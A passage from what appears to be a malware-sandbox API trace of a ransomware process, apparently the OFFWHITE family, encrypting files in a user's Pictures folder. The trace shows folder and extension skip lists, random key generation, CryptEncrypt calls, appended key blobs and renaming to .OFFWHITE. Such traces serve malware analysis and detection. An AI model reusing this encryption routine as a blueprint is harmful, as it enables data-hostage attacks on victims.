ftCreationTime.dwLowDateTime=0x104c0250, ftCreationTime.dwHighDateTime=0x1d5ddba, ftLastAccessTime.dwLowDateTime=0x4f873fa0, ftLastAccessTime.dwHighDateTime=0x1d5e320, ftLastWriteTime.dwLowDateTime=0x4f873fa0, ftLastWriteTime.dwHighDateTime=0x1d5e320, nFileSizeHigh=0x0, nFileSizeLow=0x148f0, dwReserved0=0x295cb3c, dwReserved1=0x42d727a7, cFileName="iFbp2a_-a.gif", cAlternateFileName="IFBP2A~1.GIF")) returned 1 [0135.579] lstrcmpiW (lpString1="iFbp2a_-a.gif", lpString2=".") returned 1 [0135.579] lstrcmpiW (lpString1="iFbp2a_-a.gif", lpString2="..") returned 1 [0135.579] lstrcmpiW (lpString1="iFbp2a_-a.gif", lpString2="...") returned 1 [0135.579] lstrcmpiW (lpString1="iFbp2a_-a.gif", lpString2="windows") returned -1 [0135.579] lstrcmpiW (lpString1="iFbp2a_-a.gif", lpString2="$recycle.bin") returned 1 [0135.579] lstrcmpiW (lpString1="iFbp2a_-a.gif", lpString2="rsa") returned -1 [0135.579] lstrcmpiW (lpString1="iFbp2a_-a.gif", lpString2="ntuser.dat") returned -1 [0135.579] lstrcmpiW (lpString1="iFbp2a_-a.gif", lpString2="programdata") returned -1 [0135.579] lstrcmpiW (lpString1="iFbp2a_-a.gif", lpString2="appdata") returned 1 [0135.579] lstrcmpiW (lpString1="iFbp2a_-a.gif", lpString2="program files") returned -1 [0135.579] lstrcmpiW (lpString1="iFbp2a_-a.gif", lpString2="program files (x86)") returned -1 [0135.579] lstrcpyW (in: lpString1=0x295cde8, lpString2="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\gNEccgvDLtY7H2sg3p04\\1POmGc9c\\rMts7wxti\\wu4JnlA\\" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\gNEccgvDLtY7H2sg3p04\\1POmGc9c\\rMts7wxti\\wu4JnlA\\") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\gNEccgvDLtY7H2sg3p04\\1POmGc9c\\rMts7wxti\\wu4JnlA\\" [0135.579] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\gNEccgvDLtY7H2sg3p04\\1POmGc9c\\rMts7wxti\\wu4JnlA\\", lpString2="iFbp2a_-a.gif" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\gNEccgvDLtY7H2sg3p04\\1POmGc9c\\rMts7wxti\\wu4JnlA\\iFbp2a_-a.gif") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\gNEccgvDLtY7H2sg3p04\\1POmGc9c\\rMts7wxti\\wu4JnlA\\iFbp2a_-a.gif" [0135.580] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0135.580] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0135.580] PathFindExtensionW (pszPath="iFbp2a_-a.gif") returned=".gif" [0135.580] lstrcmpiW (lpString1=".gif", lpString2=".exe") returned 1 [0135.580] lstrcmpiW (lpString1=".gif", lpString2=".log") returned -1 [0135.580] lstrcmpiW (lpString1=".gif", lpString2=".cab") returned 1 [0135.580] lstrcmpiW (lpString1=".gif", lpString2=".cmd") returned 1 [0135.580] lstrcmpiW (lpString1=".gif", lpString2=".com") returned 1 [0135.580] lstrcmpiW (lpString1=".gif", lpString2=".cpl") returned 1 [0135.580] lstrcmpiW (lpString1=".gif", lpString2=".ini") returned -1 [0135.580] lstrcmpiW (lpString1=".gif", lpString2=".dll") returned 1 [0135.580] lstrcmpiW (lpString1=".gif", lpString2=".url") returned -1 [0135.580] lstrcmpiW (lpString1=".gif", lpString2=".ttf") returned -1 [0135.580] lstrcmpiW (lpString1=".gif", lpString2=".mp3") returned -1 [0135.580] lstrcmpiW (lpString1=".gif", lpString2=".pif") returned -1 [0135.580] lstrcmpiW (lpString1=".gif", lpString2=".mp4") returned -1 [0135.580] lstrcmpiW (lpString1=".gif", lpString2=".OFFWHITE") returned -1 [0135.580] lstrcmpiW (lpString1=".gif", lpString2=".msi") returned -1 [0135.580] lstrcmpiW (lpString1="iFbp2a_-a.gif", lpString2="OFFWHITE-MANUAL.txt") returned -1 [0135.580] GetProcessHeap () returned 0x500000 [0135.580] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x8) returned 0x531af0 [0135.580] CreateFileW (lpFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\gNEccgvDLtY7H2sg3p04\\1POmGc9c\\rMts7wxti\\wu4JnlA\\iFbp2a_-a.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\gneccgvdlty7h2sg3p04\\1pomgc9c\\rmts7wxti\\wu4jnla\\ifbp2a_-a.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1e4 [0135.581] GetFileSizeEx (in: hFile=0x1e4, lpFileSize=0x295cb60 | out: lpFileSize=0x295cb60*=84208) returned 1 [0135.581] GetProcessHeap () returned 0x500000 [0135.581] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x5314d0 [0135.581] GetProcessHeap () returned 0x500000 [0135.581] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x5314e8 [0135.581] GetProcessHeap () returned 0x500000 [0135.581] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x524d00 [0135.581] GetProcessHeap () returned 0x500000 [0135.581] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x524e08 [0135.581] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0135.581] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0135.581] SystemFunction036 (in: RandomBuffer=0x5314d0, RandomBufferLength=0x10 | out: RandomBuffer=0x5314d0) returned 1 [0135.581] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0135.581] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0135.581] SystemFunction036 (in: RandomBuffer=0x5314e8, RandomBufferLength=0x10 | out: RandomBuffer=0x5314e8) returned 1 [0135.581] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0135.581] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0135.581] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x524d00*, pdwDataLen=0x295c910*=0x10, dwBufLen=0x100 | out: pbData=0x524d00*, pdwDataLen=0x295c910*=0x100) returned 1 [0135.582] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0135.582] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0135.582] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x524e08*, pdwDataLen=0x295c90c*=0x10, dwBufLen=0x100 | out: pbData=0x524e08*, pdwDataLen=0x295c90c*=0x100) returned 1 [0135.582] SetFilePointerEx (in: hFile=0x1e4, liDistanceToMove=0x148f0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0135.582] SetLastError (dwErrCode=0x0) [0135.582] WriteFile (in: hFile=0x1e4, lpBuffer=0x524d00*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295cb4c, lpOverlapped=0x0 | out: lpBuffer=0x524d00*, lpNumberOfBytesWritten=0x295cb4c*=0x100, lpOverlapped=0x0) returned 1 [0135.584] GetLastError () returned 0x0 [0135.584] GetLastError () returned 0x0 [0135.584] SetFilePointerEx (in: hFile=0x1e4, liDistanceToMove=0x149f0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0135.584] WriteFile (in: hFile=0x1e4, lpBuffer=0x524e08*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295cb4c, lpOverlapped=0x0 | out: lpBuffer=0x524e08*, lpNumberOfBytesWritten=0x295cb4c*=0x100, lpOverlapped=0x0) returned 1 [0135.584] SetFilePointerEx (in: hFile=0x1e4, liDistanceToMove=0x14af0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0135.584] WriteFile (in: hFile=0x1e4, lpBuffer=0x531af0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x295cb4c, lpOverlapped=0x0 | out: lpBuffer=0x531af0*, lpNumberOfBytesWritten=0x295cb4c*=0x8, lpOverlapped=0x0) returned 1 [0135.584] GetProcessHeap () returned 0x500000 [0135.584] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x148f0) returned 0x55d7d0 [0135.584] SetFilePointerEx (in: hFile=0x1e4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0135.584] ReadFile (in: hFile=0x1e4, lpBuffer=0x55d7d0, nNumberOfBytesToRead=0x148f0, lpNumberOfBytesRead=0x295cb40, lpOverlapped=0x0 | out: lpBuffer=0x55d7d0*, lpNumberOfBytesRead=0x295cb40*=0x148f0, lpOverlapped=0x0) returned 1 [0135.589] SetFilePointerEx (in: hFile=0x1e4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0135.589] WriteFile (in: hFile=0x1e4, lpBuffer=0x55d7d0*, nNumberOfBytesToWrite=0x148f0, lpNumberOfBytesWritten=0x295cb4c, lpOverlapped=0x0 | out: lpBuffer=0x55d7d0*, lpNumberOfBytesWritten=0x295cb4c*=0x148f0, lpOverlapped=0x0) returned 1 [0135.589] GetProcessHeap () returned 0x500000 [0135.589] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x55d7d0 | out: hHeap=0x500000) returned 1 [0135.589] CloseHandle (hObject=0x1e4) returned 1 [0135.592] GetProcessHeap () returned 0x500000 [0135.592] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x524d00 | out: hHeap=0x500000) returned 1 [0135.592] GetProcessHeap () returned 0x500000 [0135.592] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x524e08 | out: hHeap=0x500000) returned 1 [0135.592] GetProcessHeap () returned 0x500000 [0135.592] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5314d0 | out: hHeap=0x500000) returned 1 [0135.592] GetProcessHeap () returned 0x500000 [0135.592] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5314e8 | out: hHeap=0x500000) returned 1 [0135.592] lstrcpyW (in: lpString1=0x295c938, lpString2="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\gNEccgvDLtY7H2sg3p04\\1POmGc9c\\rMts7wxti\\wu4JnlA\\iFbp2a_-a.gif" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\gNEccgvDLtY7H2sg3p04\\1POmGc9c\\rMts7wxti\\wu4JnlA\\iFbp2a_-a.gif") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\gNEccgvDLtY7H2sg3p04\\1POmGc9c\\rMts7wxti\\wu4JnlA\\iFbp2a_-a.gif" [0135.592] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\gNEccgvDLtY7H2sg3p04\\1POmGc9c\\rMts7wxti\\wu4JnlA\\iFbp2a_-a.gif", lpString2=".OFFWHITE" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\gNEccgvDLtY7H2sg3p04\\1POmGc9c\\rMts7wxti\\wu4JnlA\\iFbp2a_-a.gif.OFFWHITE") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\gNEccgvDLtY7H2sg3p04\\1POmGc9c\\rMts7wxti\\wu4JnlA\\iFbp2a_-a.gif.OFFWHITE" [0135.592] MoveFileW (lpExistingFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\gNEccgvDLtY7H2sg3p04\\1POmGc9c\\rMts7wxti\\wu4JnlA\\iFbp2a_-a.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\gneccgvdlty7h2sg3p04\\1pomgc9c\\rmts7wxti\\wu4jnla\\ifbp2a_-a.gif"), lpNewFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\gNEccgvDLtY7H2sg3p04\\1POmGc9c\\rMts7wxti\\wu4JnlA\\iFbp2a_-a.gif.OFFWHITE" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\gneccgvdlty7h2sg3p04\\1pomgc9c\\rmts7wxti\\wu4jnla\\ifbp2a_-a.gif.offwhite")) returned 1 [0135.593] FindNextFileW (in: hFindFile=0x544790, lpFindFileData=0x295cb98 | out: lpFindFileData=0x295cb98*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4f4603b0, ftCreationTime.dwHighDateTime=0x1d5d866, ftLastAccessTime.dwLowDateTime=0xd8684b40, ftLastAccessTime.dwHighDateTime=0x1d5d937, ftLastWriteTime.dwLowDateTime=0xd8684b40, ftLastWriteTime.dwHighDateTime=0x1d5d937, nFileSizeHigh=0x0, nFileSizeLow=0x8321, dwReserved0=0x295cb3c, dwReserved1=0x42d727a7, cFileName="q8QHDzZOQliL7f3Y.bmp", cAlternateFileName="Q8QHDZ~1.BMP")) returned 1 [0135.593] lstrcmpiW (lpString1="q8QHDzZOQliL7f3Y.bmp", lpString2=".") returned 1 [0135.593] lstrcmpiW (lpString1="q8QHDzZOQliL7f3Y.bmp", lpString2="..") returned 1 [0135.593] lstrcmpiW (lpString1="q8QHDzZOQliL7f3Y.bmp", lpString2="...") returned 1 [0135.593] lstrcmpiW (lpString1="q8QHDzZOQliL7f3Y.bmp", lpString2="windows") returned -1 [0135.593] lstrcmpiW (lpString1="q8QHDzZOQliL7f3Y.bmp", lpString2="$recycle.bin") returned 1 [0135.593] lstrcmpiW (lpString1="q8QHDzZOQliL7f3Y.bmp", lpString2="rsa") returned -1 [0135.593] lstrcmpiW (lpString1="q8QHDzZOQliL7f3Y.bmp", lpString2="ntuser.dat") returned 1 [0135.593] lstrcmpiW (lpString1="q8QHDzZOQliL7f3Y.bmp", lpString2="programdata") returned 1 [0135.593] lstrcmpiW (lpString1="q8QHDzZOQliL7f3Y.bmp", lpString2="appdata") returned 1 [0135.593] lstrcmpiW (lpString1="q8QHDzZOQliL7f3Y.bmp", lpString2="program files") returned 1 [0135.593] lstrcmpiW (lpString1="q8QHDzZOQliL7f3Y.bmp", lpString2="program files (x86)") returned 1 [0135.593] lstrcpyW (in: lpString1=0x295cde8, lpString2="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\gNEccgvDLtY7H2sg3p04\\1POmGc9c\\rMts7wxti\\wu4JnlA\\" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\gNEccgvDLtY7H2sg3p04\\1POmGc9c\\rMts7wxti\\wu4JnlA\\") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\gNEccgvDLtY7H2sg3p04\\1POmGc9c\\rMts7wxti\\wu4JnlA\\" [0135.593] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\gNEccgvDLtY7H2sg3p04\\1POmGc9c\\rMts7wxti\\wu4JnlA\\", lpString2="q8QHDzZOQliL7f3Y.bmp" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\gNEccgvDLtY7H2sg3p04\\1POmGc9c\\rMts7wxti\\wu4JnlA\\q8QHDzZOQliL7f3Y.bmp") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\gNEccgvDLtY7H2sg3p04\\1POmGc9c\\rMts7wxti\\wu4JnlA\\q8QHDzZOQliL7f3Y.bmp" [0135.593] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0135.593] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0135.593] PathFindExtensionW (pszPath="q8QHDzZOQliL7f3Y.bmp") returned=".bmp" [0135.593] lstrcmpiW (lpString1=".bmp", lpString2=".exe") returned -1 [0135.593] lstrcmpiW (lpString1=".bmp", lpString2=".log") returned -1 [0135.593] lstrcmpiW (lpString1=".bmp", lpString2=".cab") returned -1 [0135.594] lstrcmpiW (lpString1=".bmp", lpString2=".cmd") returned -1 [0135.594] lstrcmpiW (lpString1=".bmp", lpString2=".com") returned -1 [0135.594] lstrcmpiW (lpString1=".bmp", lpString2=".cpl") returned -1 [0135.594] lstrcmpiW (lpString1=".bmp", lpString2=".ini") returned -1 [0135.594] lstrcmpiW (lpString1=".bmp", lpString2=".dll") returned -1 [0135.594] lstrcmpiW (lpString1=".bmp", lpString2=".url") returned -1 [0135.594] lstrcmpiW (lpString1=".bmp", lpString2=".ttf") returned -1 [0135.594] lstrcmpiW (lpString1=".bmp", lpString2=".mp3") returned -1 [0135.594] lstrcmpiW (lpString1=".bmp", lpString2=".pif") returned -1 [0135.594] lstrcmpiW (lpString1=".bmp", lpString2=".mp4") returned -1 [0135.594] lstrcmpiW (lpString1=".bmp", lpString2=".OFFWHITE") returned -1 [0135.594] lstrcmpiW (lpString1=".bmp", lpString2=".msi") returned -1 [0135.594] lstrcmpiW (lpString1="q8QHDzZOQliL7f3Y.bmp", lpString2="OFFWHITE-MANUAL.txt") returned 1 [0135.594] GetProcessHeap () returned 0x500000 [0135.594] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x8) returned 0x531b00 [0135.594] CreateFileW (lpFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\gNEccgvDLtY7H2sg3p04\\1POmGc9c\\rMts7wxti\\wu4JnlA\\q8QHDzZOQliL7f3Y.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\gneccgvdlty7h2sg3p04\\1pomgc9c\\rmts7wxti\\wu4jnla\\q8qhdzzoqlil7f3y.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1e4 [0135.594] GetFileSizeEx (in: hFile=0x1e4, lpFileSize=0x295cb60 | out: lpFileSize=0x295cb60*=33569) returned 1 [0135.594] GetProcessHeap () returned 0x500000 [0135.594] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x5314e8 [0135.594] GetProcessHeap () returned 0x500000 [0135.594] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x5314d0 [0135.594] GetProcessHeap () returned 0x500000 [0135.594] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x524e08 [0135.594] GetProcessHeap () returned 0x500000 [0135.594] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x524d00 [0135.594] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0135.594] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0135.595] SystemFunction036 (in: RandomBuffer=0x5314e8, RandomBufferLength=0x10 | out: RandomBuffer=0x5314e8) returned 1 [0135.595] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0135.595] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0135.595] SystemFunction036 (in: RandomBuffer=0x5314d0, RandomBufferLength=0x10 | out: RandomBuffer=0x5314d0) returned 1 [0135.595] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0135.595] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0135.595] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x524e08*, pdwDataLen=0x295c910*=0x10, dwBufLen=0x100 | out: pbData=0x524e08*, pdwDataLen=0x295c910*=0x100) returned 1 [0135.595] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0135.595] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0135.595] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x524d00*, pdwDataLen=0x295c90c*=0x10, dwBufLen=0x100 | out: pbData=0x524d00*, pdwDataLen=0x295c90c*=0x100) returned 1 [0135.595] SetFilePointerEx (in: hFile=0x1e4, liDistanceToMove=0x8321, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0135.595] SetLastError (dwErrCode=0x0) [0135.595] WriteFile (in: hFile=0x1e4, lpBuffer=0x524e08*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295cb4c, lpOverlapped=0x0 | out: lpBuffer=0x524e08*, lpNumberOfBytesWritten=0x295cb4c*=0x100, lpOverlapped=0x0) returned 1 [0135.597] GetLastError () returned 0x0 [0135.597] GetLastError () returned 0x0 [0135.597] SetFilePointerEx (in: hFile=0x1e4, liDistanceToMove=0x8421, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0135.597] WriteFile (in: hFile=0x1e4, lpBuffer=0x524d00*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295cb4c, lpOverlapped=0x0 | out: lpBuffer=0x524d00*, lpNumberOfBytesWritten=0x295cb4c*=0x100, lpOverlapped=0x0) returned 1 [0135.597] SetFilePointerEx (in: hFile=0x1e4, liDistanceToMove=0x8521, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0135.597] WriteFile (in: hFile=0x1e4, lpBuffer=0x531b00*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x295cb4c, lpOverlapped=0x0 | out: lpBuffer=0x531b00*, lpNumberOfBytesWritten=0x295cb4c*=0x8, lpOverlapped=0x0) returned 1 [0135.597] GetProcessHeap () returned 0x500000 [0135.597] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x8321) returned 0x55d7d0 [0135.598] SetFilePointerEx (in: hFile=0x1e4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0135.598] ReadFile (in: hFile=0x1e4, lpBuffer=0x55d7d0, nNumberOfBytesToRead=0x8321, lpNumberOfBytesRead=0x295cb40, lpOverlapped=0x0 | out: lpBuffer=0x55d7d0*, lpNumberOfBytesRead=0x295cb40*=0x8321, lpOverlapped=0x0) returned 1 [0135.600] SetFilePointerEx (in: hFile=0x1e4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0135.600] WriteFile (in: hFile=0x1e4, lpBuffer=0x55d7d0*, nNumberOfBytesToWrite=0x8321, lpNumberOfBytesWritten=0x295cb4c, lpOverlapped=0x0 | out: lpBuffer=0x55d7d0*, lpNumberOfBytesWritten=0x295cb4c*=0x8321, lpOverlapped=0x0) returned 1 [0135.600] GetProcessHeap () returned 0x500000 [0135.600] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x55d7d0 | out: hHeap=0x500000) returned 1 [0135.600] CloseHandle (hObject=0x1e4) returned 1 [0135.603] GetProcessHeap () returned 0x500000 [0135.603] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x524e08 | out: hHeap=0x500000) returned 1 [0135.603] GetProcessHeap () returned 0x500000 [0135.603] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x524d00 | out: hHeap=0x500000) returned 1 [0135.603] GetProcessHeap () returned 0x500000 [0135.603] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5314e8 | out: hHeap=0x500000) returned 1 [0135.603] GetProcessHeap () returned 0x500000 [0135.603] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5314d0 | out: hHeap=0x500000) returned 1 [0135.603] lstrcpyW (in: lpString1=0x295c938, lpString2="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\gNEccgvDLtY7H2sg3p04\\1POmGc9c\\rMts7wxti\\wu4JnlA\\q8QHDzZOQliL7f3Y.bmp" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\gNEccgvDLtY7H2sg3p04\\1POmGc9c\\rMts7wxti\\wu4JnlA\\q8QHDzZOQliL7f3Y.bmp") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\gNEccgvDLtY7H2sg3p04\\1POmGc9c\\rMts7wxti\\wu4JnlA\\q8QHDzZOQliL7f3Y.bmp" [0135.603] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\gNEccgvDLtY7H2sg3p04\\1POmGc9c\\rMts7wxti\\wu4JnlA\\q8QHDzZOQliL7f3Y.bmp", lpString2=".OFFWHITE" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\gNEccgvDLtY7H2sg3p04\\1POmGc9c\\rMts7wxti\\wu4JnlA\\q8QHDzZOQliL7f3Y.bmp.OFFWHITE") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\gNEccgvDLtY7H2sg3p04\\1POmGc9c\\rMts7wxti\\wu4JnlA\\q8QHDzZOQliL7f3Y.bmp.OFFWHITE" [0135.603] MoveFileW (lpExistingFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\gNEccgvDLtY7H2sg3p04\\1POmGc9c\\rMts7wxti\\wu4JnlA\\q8QHDzZOQliL7f3Y.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\gneccgvdlty7h2sg3p04\\1pomgc9c\\rmts7wxti\\wu4jnla\\q8qhdzzoqlil7f3y.bmp"), lpNewFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\gNEccgvDLtY7H2sg3p04\\1POmGc9c\\rMts7wxti\\wu4JnlA\\q8QHDzZOQliL7f3Y.bmp.OFFWHITE" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\gneccgvdlty7h2sg3p04\\1pomgc9c\\rmts7wxti\\wu4jnla\\q8qhdzzoqlil7f3y.bmp.offwhite")) returned 1 [0135.604] FindNextFileW (in: hFindFile=0x544790, lpFindFileData=0x295cb98 | out: lpFindFileData=0x295cb98*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa9840c0, ftCreationTime.dwHighDateTime=0x1d5db04, ftLastAccessTime.dwLowDateTime=0xbf55aa0, ftLastAccessTime.dwHighDateTime=0x1d5e687, ftLastWriteTime.dwLowDateTime=0xbf55aa0, ftLastWriteTime.dwHighDateTime=0x1d5e687, nFileSizeHigh=0x0, nFileSizeLow=0xcd52, dwReserved0=0x295cb3c, dwReserved1=0x42d727a7, cFileName="YJ5669616Mniq7E9dpnm.jpg", cAlternateFileName="YJ5669~1.JPG")) returned 1 [0135.604] lstrcmpiW (lpString1="YJ5669616Mniq7E9dpnm.jpg", lpString2=".") returned 1 [0135.604] lstrcmpiW (lpString1="YJ5669616Mniq7E9dpnm.jpg", lpString2="..") returned 1 [0135.604] lstrcmpiW (lpString1="YJ5669616Mniq7E9dpnm.jpg", lpString2="...") returned 1 [0135.604] lstrcmpiW (lpString1="YJ5669616Mniq7E9dpnm.jpg", lpString2="windows") returned 1 [0135.604] lstrcmpiW (lpString1="YJ5669616Mniq7E9dpnm.jpg", lpString2="$recycle.bin") returned 1 [0135.604] lstrcmpiW (lpString1="YJ5669616Mniq7E9dpnm.jpg", lpString2="rsa") returned 1 [0135.604] lstrcmpiW (lpString1="YJ5669616Mniq7E9dpnm.jpg", lpString2="ntuser.dat") returned 1 [0135.604] lstrcmpiW (lpString1="YJ5669616Mniq7E9dpnm.jpg", lpString2="programdata") returned 1 [0135.604] lstrcmpiW (lpString1="YJ5669616Mniq7E9dpnm.jpg", lpString2="appdata") returned 1 [0135.604] lstrcmpiW (lpString1="YJ5669616Mniq7E9dpnm.jpg", lpString2="program files") returned 1 [0135.604] lstrcmpiW (lpString1="YJ5669616Mniq7E9dpnm.jpg", lpString2="program files (x86)") returned 1 [0135.604] lstrcpyW (in: lpString1=0x295cde8, lpString2="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\gNEccgvDLtY7H2sg3p04\\1POmGc9c\\rMts7wxti\\wu4JnlA\\" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\gNEccgvDLtY7H2sg3p04\\1POmGc9c\\rMts7wxti\\wu4JnlA\\") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\gNEccgvDLtY7H2sg3p04\\1POmGc9c\\rMts7wxti\\wu4JnlA\\" [0135.604] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\gNEccgvDLtY7H2sg3p04\\1POmGc9c\\rMts7wxti\\wu4JnlA\\", lpString2="YJ5669616Mniq7E9dpnm.jpg" | out: lpString1="C:/Users\\5p5NrGJn0jS 